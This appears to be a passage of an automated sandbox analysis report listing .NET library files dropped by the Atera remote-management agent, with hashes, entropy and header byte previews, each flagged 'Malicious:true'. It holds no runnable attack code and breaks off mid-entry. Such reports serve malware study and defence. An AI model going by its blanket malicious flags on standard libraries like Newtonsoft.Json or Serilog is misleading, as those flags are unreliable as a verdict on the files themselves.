                                                                                                                                                                                                                                                                                              SSDEEP:384:JupZ5W3lFhrJc6mz8O0TVHprQiWAIczKeG2OhhjXK2701rXKNpvq11W3fUWKNybr:JupZ5W1rRcoZXWNQajvpwEpYi605Dd
                                                                                                                                                                                                                                                                                              MD5:F19E5EA9BC7A58F5027CCE18D0F1019D
                                                                                                                                                                                                                                                                                              SHA1:D07F70DB1427841A36853DDD2F76285AAB64AE44
                                                                                                                                                                                                                                                                                              SHA-256:EAB1CBB04CC1099001FDD6315D4C226F4D3D4FDEDF78050C22C9AE723BCBF606
                                                                                                                                                                                                                                                                                              SHA-512:47DC4797AEBEC8D434137C0D7ED8192172AC04A139E6153090C46834A4A205C2BC80AB6EBF4C672294727F20BAD948408EB09E0BC3DC95F02B608F9E1448A81B
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....1..........." ..0..T.........."s... ........... ..............................I.....`..................................r..O....................^..P(...........q..T............................................ ............... ..H............text...(S... ...T.................. ..`.rsrc................V..............@..@.reloc...............\..............@..B.................s......H......../..PA..................Dq......................................*.-..(....*..s(...z..()...,..-..s(...z.r...ps*...z.*:.(+.....}....*..0..+........{....o9......+......o,....o-.....X....i2.*:.(+.....}....*2.{....o4...*..{....*v.r/..p(.....~....s....o.....*....0..M........r?..p(.....o/...~....(...+.o/...(...+(2....o/...(...+(2....o/...(...+(2....*..(+...*.~....*.*.(....*.s.........*.~....*..(+...*.*.s.........*..(+.....}......(......}......}.......}....*..{....*..{....*".

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Logging.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):50768
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.397157660922387
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:7byNvwqX2LvG84aSFWZNSYv6VmTygGPSikiw64yw64Ibdez7+Rs7XTfWDaEpYi6i:wd2C9a2+EYYbgGB4ImYYWDb766B
                                                                                                                                                                                                                                                                                              MD5:8DB37C3674788EF9C49DAC0FF3B778B2
                                                                                                                                                                                                                                                                                              SHA1:7AE7ED79C91B3024AB4F9503303AE1E39D5D3EF3
                                                                                                                                                                                                                                                                                              SHA-256:18694F875E8D75F1D409EDD7352A5B90F3AB8A4F4A9E6384BF9742E3DAB02F95
                                                                                                                                                                                                                                                                                              SHA-512:F1F43460CB9C76C53EFE03B546D88C7B3870429D70C463719873E84778940E9884C93740BA7D3FF70923EAE826C7BF28441CA58ABE3DFE3C4695E96D855BDF8E
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...t.0..........." ..0.............Z.... ........... ..............................K.....`.....................................O.......(...............P(..............T............................................ ............... ..H............text...`.... ...................... ..`.rsrc...(...........................@..@.reloc..............................@..B................9.......H.......lD..pi.........................................................*.-..(....*..s....z..(/...,..-..s....z.r...ps0...z.*.~....*..0..........(....,..*..(.....o1......&...*...................0...........(.......(2...-..,..*.*.(....,.r/..p......%...%...(3...*..(4...*.(....,.r/..p......%...%...%...(3...*...(5...*.(....,!r/..p......%...%...%...%...(3...*....(6...*..,&(....,..r/..pr/..p.(3...(7...*..(8...*.*.(....,.r/..p......%...%...(3...*...(9...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.ConfigurationExtensions.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):22608
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.597507812973862
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:384:wqKGKA3a66KxTfdzWzP0WRNyb8E9VF6IYijSJIVx92XPx4G:HKG/L1cHEpYi60E54G
                                                                                                                                                                                                                                                                                              MD5:0AF0772BBEE511CA2E183F47EE54CF7C
                                                                                                                                                                                                                                                                                              SHA1:59776DBAF20573CF70ECE3EE76454E9F1069335D
                                                                                                                                                                                                                                                                                              SHA-256:EF306A7FA475718A2F5092AD54A1CF5187F74725DC51D17310C5022538EFF592
                                                                                                                                                                                                                                                                                              SHA-512:7716EA30C86BC3DB56021208CFDFA16C8D98637DA5919A636F18355DB0C48C34DFD8B715E13D20A52A3F3BD4097606E0BC28EA78D49F4E1D22E8D5D52B00254A
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...J/..........." ..0..&...........D... ...`....... ....................................`..................................C..O....`...............0..P(...........B..T............................................ ............... ..H............text....$... ...&.................. ..`.rsrc........`.......(..............@..@.reloc..............................@..B.................C......H.......t#.......................B......................................*.-..(....*..s....z..(....,..-..s....z.r...ps....z.*...~ ...%-.&~!....."...s#...%. ...(...+*..r/..p(.....o$....o%.....(...+&.*...0..P.......s&......}'.....}(....r/..p(.....{'...rM..p(........)...s*...o...+&.o$...(...+&.*6.~-....(...+*....~....%-.&~/.....0...s#...%.....(...+*:.~-.....(...+*..rq..p(.....r...p(.....(1...&...s2...(...+&....s4...(...+*6.~-....(5...*..(6....r...p(......}7.....%-.&~-...}8...*..{

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Options.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):64592
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.342689807278242
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:1536:WahqHoZX+NmzYUGrCUidKHPhwMEyBoXeg76P:WYXfFGrCLQvhwME1Xegw
                                                                                                                                                                                                                                                                                              MD5:1312309A104ED37DCC4F7DFB1FF61B5E
                                                                                                                                                                                                                                                                                              SHA1:C050AE3C858B45C9CA3BC57F2161895263CA94C7
                                                                                                                                                                                                                                                                                              SHA-256:4F64A7DB61B88C07AD49EDE87CDFDE8D07A759BA881AFB0D630BC34ECC98A78F
                                                                                                                                                                                                                                                                                              SHA-512:169CB7541E05A2CD421A2E5D901FBF9BB6A7BA1DC9F4013D4EA4F75F6DD00C2522BDE36037652016F4E80AD12C4E123E731176277CD985A6DC34010D39F923A6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....u..........." ..0.............Z.... ........... .......................@......oI....`.....................................O.......H...............P(... ..........T............................................ ............... ..H............text...`.... ...................... ..`.rsrc...H...........................@..@.reloc....... ......................@..B................9.......H.......LJ..............................................................*.-..(....*..s-...z..(....,..-..s-...z.r...ps/...z.*.~....*..0..........(....,..*..(.....o0......&...*...................0...........(.......(1...-..,..*.*.(....,.r/..p......%...%...(2...*..(3...*.(....,.r/..p......%...%...%...(2...*...(4...*.(....,!r/..p......%...%...%...%...(2...*....(5...*..,&(....,..r/..pr/..p.(2...(6...*..(7...*.*.(....,.r/..p......%...%...(2...*...(8...*.(....,.r/..p......%...%...%.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Extensions.Primitives.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):43600
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.351168895705445
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:kKEGbmbB0QERF7v6EtkKS+1ke97a1O33ttBOP7yW5yfyqTuia+15OFy0EpYi60AO:kpGe0QERFhkKSM7ag33ttBOP7yVfHTua
                                                                                                                                                                                                                                                                                              MD5:82E0D4E69D23A3C5343563EF21C1A48F
                                                                                                                                                                                                                                                                                              SHA1:8C918651007B7D240042F5FB20F88ED277718BFC
                                                                                                                                                                                                                                                                                              SHA-256:6AA4EEDE0E8E16A736CF564BC72FC92CA041998554C6FD76B251BF273250E46A
                                                                                                                                                                                                                                                                                              SHA-512:EE9C1CCAF458A5F5247B18D6757CD9554AA2C983D2F8B703E59C5D64AA471F69CEC75C5F1EB76E01AC44251DA436C70C9196838E542C5ED2CCACC796FA7C0F48
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...7............." ..0..v............... ........... ...............................6....`.................................?...O.......l...............P(..........H...T............................................ ............... ..H............text....t... ...v.................. ..`.rsrc...l............x..............@..@.reloc..............................@..B................s.......H.......d<..LP..........................................................~....*..0..........(....,..*..(.....o6......&...*...................0...........(.......(7...-..,..*.*.(....,.r...p......%...%...(8...*..(9...*.(....,.r...p......%...%...%...(8...*...(:...*.(....,!r...p......%...%...%...%...(8...*....(;...*..,&(....,..r...pr...p.(8...(<...*..(=...*.*.(....,.r...p......%...%...(8...*...(>...*.(....,.r...p......%...%...%...(8...*....(?...*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Microsoft.Win32.TaskScheduler.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):345168
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.141597338666124
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:Vpc1zjTFIfqAnI7FZVllnuJxKrSj8r2yQQLeBLPHGUdlWOAlMoBJR1TaKwQz8wef:spTCqAn+fnw5h9hdls+IZTWc+
                                                                                                                                                                                                                                                                                              MD5:B30DEB887F1258145FFAC337D5319A80
                                                                                                                                                                                                                                                                                              SHA1:E9482F5E6F21860AD127A8CB8A799D96A7834218
                                                                                                                                                                                                                                                                                              SHA-256:6D28E9004F465C3E84DBFD05E2994CC0EC3880395C11441066BDE2B1BA91D766
                                                                                                                                                                                                                                                                                              SHA-512:2D85AD1262BB7B59FBF59932647725918B3FA78B400731DD7E8C7679A327979730ABC2627FFF628E40A7F2B11B0CD9EE5257523AD1768554114F681AE663D607
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z............." ..0..............0... ...@....... ...............................i....`.................................S0..O....@..................P(...`......D/..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................0......H...........xZ..........|...H.............................................{....*..{....*V.(......}......}....*...0..A........u2.......4.,/(.....{.....{....o....,.(.....{.....{....o....*.*.*. ..<. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*...0..b........r...p......%..{.......%q5....5...-.&.+...5...o.....%..{.......%q6....6...-.&.+...6...o.....(....*..{....*..{....*..{....*r.(......}......}......}....*..0..Y........u7.......L.,G(.....{.....{....o....,/(.....{.....{....o....

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Newtonsoft.Json.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):710736
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.954086635941875
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:oFIM0KteTMN4Or4D3OdmZg5WHEaEDIGBBjgrIQtD+tVqDMj:AzMTMNNd+g5Wk78GBBjgrIQtDM
                                                                                                                                                                                                                                                                                              MD5:AA6CAB34DC85D06F21E3D857B8D497B3
                                                                                                                                                                                                                                                                                              SHA1:51945573743CA2D94F4BA8C89426ED8E93F0D593
                                                                                                                                                                                                                                                                                              SHA-256:93590886AA04268BC311DAD9C243D4F33D25AC4657038F82B98C344D8F64C579
                                                                                                                                                                                                                                                                                              SHA-512:459E227BD031D6EF6B60F259A565F37BC472F356EFDE3F8A5AD7CB1F4EBDC2EE47BCAA947759A40147864074CA383208721CEE988CD5A37194E6EFDC9BDBB6ED
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....)..........." ..0.............>.... ........... ....................... ............`.....................................O.......................P(..............T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............9............................................................(....*^.(...........%...}....*:.(......}....*:.(......}....*.(.........*....}.....(......{.....X.....}....*....0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....X...+....b..o....aX...X...o....2.....cY.....cY....cY..{......{...._..+&.{|..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.Core.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):241232
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.259472728909943
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:bBf5J52Gi4mbKnUMZFfS76JoMvHc0MUnB6gijdDREMhbUYTTQjgiOI8mIPfDJ0O:+54mbKnUMZFfS76JoMvHc0MEixNb9f
                                                                                                                                                                                                                                                                                              MD5:D14EED4B9C285F3C482CCB5C6CD9E9A7
                                                                                                                                                                                                                                                                                              SHA1:35A55F5409BE072BD946F563242E466D7C77B3FD
                                                                                                                                                                                                                                                                                              SHA-256:D405D92E477FEE9467972C83D85D93B2B98CFE5842B2C16E9FD7D46D278D0994
                                                                                                                                                                                                                                                                                              SHA-512:099A4DE22A13DD7FA70D3E54517A1733260FCA03165FCD7230E80A529301C2CAB7F4DC0DA3D0B5C68DAF47418546572CFA8A1C768663490654FCC88D2C1A3BBE
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... ..........." ..0..|.............. ........... ..............................>.....`.....................................O.......................P(.............T............................................ ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B.......................H........#...u..................P........................................0..C.......sF......}.....r...p(...+&.{....r...p(...+&....G...s-....{....(....*..0..C.......s.......}/....r...p(...+&.{/...r...p(...+&....0...s1....{/...(...+*..0..m........o2....o3....o4....o....(3...s......o5....o6....o7....o8.....o.....o.....o9...s:.....o;.....o<....o=...s>...*..(?...*"..(@...*&...(A...*.0..C.......sB......}C....r...p(...+&.{C...r...p(...+&....D...s1....{C...(...+*..oE....oF...sG....oH

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Polly.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):294480
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.211185870057264
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:eRnDreuO4up/qhteg9zo8THff0jfDyj5zAQzFWhxBNYibsus16W2hS1o:dY2steg9pbff0jfDyj5zAQzFWMR16h
                                                                                                                                                                                                                                                                                              MD5:9E5556915A2BFFA443C325643DE43FBA
                                                                                                                                                                                                                                                                                              SHA1:A2D3E0DBD177BAEAAB51E316AD77AC63B845F7B9
                                                                                                                                                                                                                                                                                              SHA-256:77E88BBD02B50D21EDDB07EF162460EFC6C420FFFD6B7F389AA81E5F13DEC743
                                                                                                                                                                                                                                                                                              SHA-512:747C752666E63881ADE2AD95AC863AD647336B627C1EA2DD696E8B0B8A2BA9EBC11B849A655DC35F146F488CC1A39069011713FF6D5A82A91AD49EF70B4C2203
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....@3..........." ..0..L...........k... ........... ...............................-....`..................................k..O....................V..P(...........j..T............................................ ............... ..H............text....K... ...L.................. ..`.rsrc................N..............@..@.reloc...............T..............@..B.................k......H.......4`......................Dj........................................(;...*^.(;......j...%...}....*:.(;.....}....*:.(;.....}....*:.(;.....}....*r.{....,.r...p(H...z..}.....*r.{....,.r...p(H...z..}.....*"..(M...*"..(N...*....0..,.......s.......}............s<...s{....{.....(....*.0..-.......s.......}............s<....s.....{.....(....*....0..(.......s.......}............s<.....{.....(....*.0..'.......s.......}............s<...s{.....(....*B...s......(....*......(....*.0..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Hosting.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40016
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.290573860045289
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:o0e1ybJtobISqLnqhs6icPGlSkEuNxS9HucEpYi60Vf:3Is6NG8kdNQ9Ha760
                                                                                                                                                                                                                                                                                              MD5:618EEFCF08F8DF431B6A22181C4B9D08
                                                                                                                                                                                                                                                                                              SHA1:FFB3A7A8BC7B7484C242D8E7D7556D29793E2B2F
                                                                                                                                                                                                                                                                                              SHA-256:70888B4D4B1677857BA439C93645D0207A4FBDF4E3364D33F8F1E89E1B860B97
                                                                                                                                                                                                                                                                                              SHA-512:4F44473FA665B4D16919F6370D81D57083020C10938ABE722DE86DFCC3BDA31C72AFD6566FEF99764481CAAF44E79BD9AAD6D6C786473BD55A882C2FCDB1929D
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...T............." ..0..j............... ........... ..............................Pd....`.................................;...O....................t..P(..........0...T............................................ ............... ..H............text....i... ...j.................. ..`.rsrc................l..............@..@.reloc...............r..............@..B................o.......H.......HG..h@..........................................................2.o....s<...*6..s7...o....*..0..>.......sd......}......}......}.....-.r...ps....z....e...s....o....&.*...0..C.......sf......}.....-.r...ps....z.{....-.r...ps....z....g...s......(....*..0..Q.......sh......}......}......}.....-.r...ps....z.{....-.r...ps....z....i...s....o....&.*....0..........sr......}!.....}".....}#....-.r1..ps....z.{#...,.....s...s....(...+&+.....t...s....(...+&.{!...,...{!...(...+&..{!..

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Extensions.Logging.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):40016
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.103957712578852
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:FjH0yVIotetvBnRKRTrNn7V+gByboak4EpYi6055l:VUyV1yARTRV1CkB76e5l
                                                                                                                                                                                                                                                                                              MD5:DF02B20DAB4C8084377A4C297B5F9662
                                                                                                                                                                                                                                                                                              SHA1:A5E8B7B36AE9C7576CEF2EB2FB8629F9CF7B9647
                                                                                                                                                                                                                                                                                              SHA-256:069E2C7EFD99C50C1FBFF1EE53D467E3946D0905115FB3B708BB016EE5721A9B
                                                                                                                                                                                                                                                                                              SHA-512:EB85CB82999720AB9E90338F8BED379CB07885FA237F38667598AAB3E1CC3403E016AD9822FC0E123DA5147A0511DFC648B5982D90A86880E3F762CE2B3A328F
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~............." ..0..j..........r.... ........... ..............................K.....`................................. ...O....................t..P(..........X`..p............................................ ............... ..H............text...xi... ...j.................. ..`.rsrc................l..............@..@.reloc...............r..............@..B................T.......H.......H0.../..................._........................................-.r...ps....z.-.r...ps....z..s......o....*v.-.r1..ps....z...s....o.....*...0..V.......s.......}.....-.rA..ps....z.,..o......./...s....(...+&+...{.....s....(....&...(...+&.*...0...........-.rQ..ps....z.o ... ....1..{.....o!...*.{.....o"...t......,..*.{.....o!.....{..........(#....{....o$... ....3..{....o%....{......o&......,..('.....*.........U.4.........s(...}.....s)...}.....s*...}.....()...*....0..:...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.Sinks.File.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):41040
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.316016485866323
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:8OTQws5P6l+m38DHBXLSycBHdDVXR/yx0PtmF4zxKEpYi60RG:hQVPW+gKZZcdXR6HGh766G
                                                                                                                                                                                                                                                                                              MD5:625498DFF2B539512B1CC21C6B7F8AA8
                                                                                                                                                                                                                                                                                              SHA1:E6F8CF4F273D1DCD9E4867BF9A36EAA1CA2B00A8
                                                                                                                                                                                                                                                                                              SHA-256:7C1D0084DC61B3CCA2BDCB291067D75555DC7E279583C2B3C21C3542239D9B5C
                                                                                                                                                                                                                                                                                              SHA-512:CA6501BD2D7CB6A68A0F63E9495E3D07169CF8AD6C3F1F045399E9644B02D5C355B31BD86019292953D96849DAEDE81FF8F2289EB12F2D71D73B2F39039094B6
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n:............" ..0..n............... ........... ...............................p....`.....................................O.......h............x..P(.............T............................................ ............... ..H............text....l... ...n.................. ..`.rsrc...h............p..............@..@.reloc...............v..............@..B.......................H........;..PN..................D........................................0..,.............................................(....*.0..*...........................................(....*...0..(.........................................(....*.0..&.......................................(....*...0..S........-.r...ps!...z.-.r%..ps!...z.-.r/..ps!...z...s"..............................(....*..0..V........-.r...ps!...z.-.rM..ps!...z.-.r%..ps!...z...#...s$.............................(...

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\Serilog.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):163408
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.235571259002522
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3072:2CMB8etU5lH7HXpqgkZEw3O5WNYvmjpkZyFnbNFk97WoNKaiDOTbzdLn9fIMKQaT:2CM/tUjH7HXpeJpX2fH99SQW
                                                                                                                                                                                                                                                                                              MD5:08920BD7402F10B95F9D54D7541064F5
                                                                                                                                                                                                                                                                                              SHA1:941AE89184ACBBB5D1593888C727BA7E72BCD86E
                                                                                                                                                                                                                                                                                              SHA-256:E00C95E3190BBB2D4C06A0C59470EE8C8BE2FA2CD9F69A70327846CBF0312148
                                                                                                                                                                                                                                                                                              SHA-512:F3410CBD824E279383DDC0412D5A1B0BA2E623000179A67020B1E9DE5B84FD34E67EEEECB546A50A83EB26ADC7B1106D421A341140989DE1A8524F9E4A4D78E1
                                                                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...w2..........." ..0..L...........j... ........... ....................................`..................................i..O.......`............V..P(...........h..T............................................ ............... ..H............text....J... ...L.................. ..`.rsrc...`............N..............@..@.reloc...............T..............@..B.................i......H.......L...............g..`...th........................................{;...*..{<...*V.(=.....};.....}<...*...0..A........u........4.,/(>....{;....{;...o?...,.(@....{<....{<...oA...*.*.*. ... )UU.Z(>....{;...oB...X )UU.Z(@....{<...oC...X*...0..b........r...p......%..{;......%q.........-.&.+.......oD....%..{<......%q.........-.&.+.......oD....(E...*..{F...*..{G...*V.(=.....}F.....}G...*.0..A........u........4.,/(>....{F....{F...o?...,.(@....{G....{G...oA...*.*.*. .T.2 )UU.

                                                                                                                                                                                                                                                                                              C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\Agent.Package.Watchdog\System.Diagnostics.EventLog.dll

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):51792
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.187613362430376
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:768:0xlSUXovBJ2nMNEGyxP+M+yOI3/YPyHlwir0EqgIGfmAXOaYb7bEpYi60PX:0nS3BJ27GyxP+M+ytiiAgILb7U76q
                                                                                                                                                                                                                                                                                              MD5:FE92440233C03428D39105EE8689042D
                                                                                                                                                                                                                                                                                              SHA1:294FCC4521EB959442C4F32215221F0735472B9B
